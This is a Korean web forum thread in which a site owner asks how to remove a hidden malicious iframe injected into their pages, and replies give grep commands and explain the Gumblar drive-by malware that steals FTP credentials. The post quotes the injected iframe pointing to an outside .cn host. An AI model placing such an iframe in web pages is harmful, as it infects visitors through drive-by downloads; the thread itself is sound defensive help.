악성코드 삭제관련 정보
악성코드 삭제관련본문
홈페이지 소스를 보면, 아래 코드가 삽입이 되어 있습니다.
삭제를 할려고 파일을 찾아도 못찾겠습니다.
common.php 파일을 삭제하고 보면, 아래코드가 사라지는데요.
이 파일하고 인클루드된 파일을 모조리 뒤져도 못찾겠습니다.
고수님들 도움좀 주세요..
<iframe src="http://greatmixlot.cn:8080/ts/in.cgi?pepsi61" width=125 height=125 style="visibility: hidden"></iframe>
삭제를 할려고 파일을 찾아도 못찾겠습니다.
common.php 파일을 삭제하고 보면, 아래코드가 사라지는데요.
이 파일하고 인클루드된 파일을 모조리 뒤져도 못찾겠습니다.
고수님들 도움좀 주세요..
<iframe src="http://greatmixlot.cn:8080/ts/in.cgi?pepsi61" width=125 height=125 style="visibility: hidden"></iframe>
댓글 전체
아래 find로 찾지 못하던가요?
find . | xargs grep "pepsi61"
find . | xargs grep "pepsi61"
grep 명령을 쓰셔도 됩니다.
grep -i -r -n pepsi61 *
파일, 행까지 찾아줍니다.
grep -i -r -n pepsi61 *
파일, 행까지 찾아줍니다.
저도 이것때문에 고생했는데요..
아래의 글을 참조하시기 바랍니다.
최근 검블러(Gumblar) 혹은 GENO 라고 불리는 악성코드가 급속히 전파되고 있습니다.
해당 악성코드는 어도비(Adobe)사의 아크로뱃이나 플래쉬의 보안 패치가 되지 않은 PC가 특정 웹 사이트를 열기만 해도 감염되는
'드라이브 바이 다운로드' 방식으로 전파되고 있어 감염속도가 매우 빠릅니다.
또한 감염된 PC 이용자가 웹사이트의 파일을 관리하는 FTP 프로그램을 가지고 있을 경우 ID와 비밀번호를 빼내
해당 웹사이트의 index , main 등의 이름을 가진 html, php 파일들을 변조해서 악성코드를 다운받는 코드를 심어놓게 됩니다.
해결 방법은
1) 해당 pc 에서 악성코드를 제거해야 합니다. 제거가 어려울 경우 OS 를 재설치해야 합니다.
그 다음 OS 와 어도비(Adobe)사의 아크로벳(Acrobat)과 플래쉬(Flash) 프로그램의 보안패치를 최신까지 설치해야 합니다.
악성코드가 제거되지 않은 상태에서 단순히 비밀번호를 바꾼채 ftp 접속을 하게 되면 지속적으로 ID 와 비밀번호가 유출되어서 사이트 변조가 지속됩니다.
부득이 하게 악성코드 제거되기 전에 급하게 수정을 하실려고 한다면 비밀번호를 바꾸시고 ftp 사용을 막고, 대신 sftp 를 사용해야 합니다. sftp 는 향후 동일 문제 예방을 위해서라도 ftp 대신 계속 사용을 하실것을 권장해드립니다.
2) 변조된 html, php 파일에서 다음과 같은 형태의 코드를 제거하시기 바랍니다.
<iframe src="http://xxxxxxxxxxxxx.cn:8080/index.php" width=198 height=141
관련자료:
http://www.boannews.com/media/view.asp?idx=16569&kind=1
http://www.fnnews.com/view?ra=Sent0901m_View&corp=fnnews&arcid=090522164152&cDateYear=2009&cDateMonth=05&cDateDay=22
http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html
백신마다 부르는 이름.
시만텍 Infostealer.Daonol
카스퍼스키 Trojan-Dropper.Win32.Agent.apfn
마이크로소프트 Win32/Daonol.F
알약(BitDefender) Exploit.PDF-JS.Gen
본 현상은 사이트가 초기화면이 느려지거나, 관리자모드 접근시 에러메시지 출력 등을 보실 수 있습니다.
아래의 글을 참조하시기 바랍니다.
최근 검블러(Gumblar) 혹은 GENO 라고 불리는 악성코드가 급속히 전파되고 있습니다.
해당 악성코드는 어도비(Adobe)사의 아크로뱃이나 플래쉬의 보안 패치가 되지 않은 PC가 특정 웹 사이트를 열기만 해도 감염되는
'드라이브 바이 다운로드' 방식으로 전파되고 있어 감염속도가 매우 빠릅니다.
또한 감염된 PC 이용자가 웹사이트의 파일을 관리하는 FTP 프로그램을 가지고 있을 경우 ID와 비밀번호를 빼내
해당 웹사이트의 index , main 등의 이름을 가진 html, php 파일들을 변조해서 악성코드를 다운받는 코드를 심어놓게 됩니다.
해결 방법은
1) 해당 pc 에서 악성코드를 제거해야 합니다. 제거가 어려울 경우 OS 를 재설치해야 합니다.
그 다음 OS 와 어도비(Adobe)사의 아크로벳(Acrobat)과 플래쉬(Flash) 프로그램의 보안패치를 최신까지 설치해야 합니다.
악성코드가 제거되지 않은 상태에서 단순히 비밀번호를 바꾼채 ftp 접속을 하게 되면 지속적으로 ID 와 비밀번호가 유출되어서 사이트 변조가 지속됩니다.
부득이 하게 악성코드 제거되기 전에 급하게 수정을 하실려고 한다면 비밀번호를 바꾸시고 ftp 사용을 막고, 대신 sftp 를 사용해야 합니다. sftp 는 향후 동일 문제 예방을 위해서라도 ftp 대신 계속 사용을 하실것을 권장해드립니다.
2) 변조된 html, php 파일에서 다음과 같은 형태의 코드를 제거하시기 바랍니다.
<iframe src="http://xxxxxxxxxxxxx.cn:8080/index.php" width=198 height=141
관련자료:
http://www.boannews.com/media/view.asp?idx=16569&kind=1
http://www.fnnews.com/view?ra=Sent0901m_View&corp=fnnews&arcid=090522164152&cDateYear=2009&cDateMonth=05&cDateDay=22
http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html
백신마다 부르는 이름.
시만텍 Infostealer.Daonol
카스퍼스키 Trojan-Dropper.Win32.Agent.apfn
마이크로소프트 Win32/Daonol.F
알약(BitDefender) Exploit.PDF-JS.Gen
본 현상은 사이트가 초기화면이 느려지거나, 관리자모드 접근시 에러메시지 출력 등을 보실 수 있습니다.
감사합니다.
